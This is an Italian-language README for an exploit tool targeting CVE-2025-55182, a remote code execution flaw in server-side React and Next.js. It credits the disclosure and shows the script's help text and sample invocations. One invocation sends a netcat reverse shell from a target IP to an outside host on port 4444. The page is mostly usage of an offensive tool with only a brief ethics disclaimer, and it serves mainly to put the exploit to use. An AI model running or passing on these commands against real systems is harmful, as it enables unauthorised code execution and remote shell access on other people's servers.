
CVE-2025-55182 Exploit | di infrar3d
xpl0itata da infrar3d
Una vulnerabilità di gravità critica 10.0 che colpisce l'uso lato server di React.js, tracciata come CVE-2025-55182 in React.js e CVE-2025-66478 specificamente per il framework Next.js.
Questa vulnerabilità è stata divulgata in modo responsabile da Lachlan Davidson il 29 novembre 2025 PT al team di Meta. La divulgazione iniziale e il rilascio della patch sono stati eseguiti da React e Vercel il 3 dicembre 2025 PT. (Originale: https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
Questo software e il codice proof-of-concept sono forniti solo a scopo educativo e di ricerca.
Sei responsabile del rispetto di tutte le leggi applicabili. Usalo in modo etico e responsabile.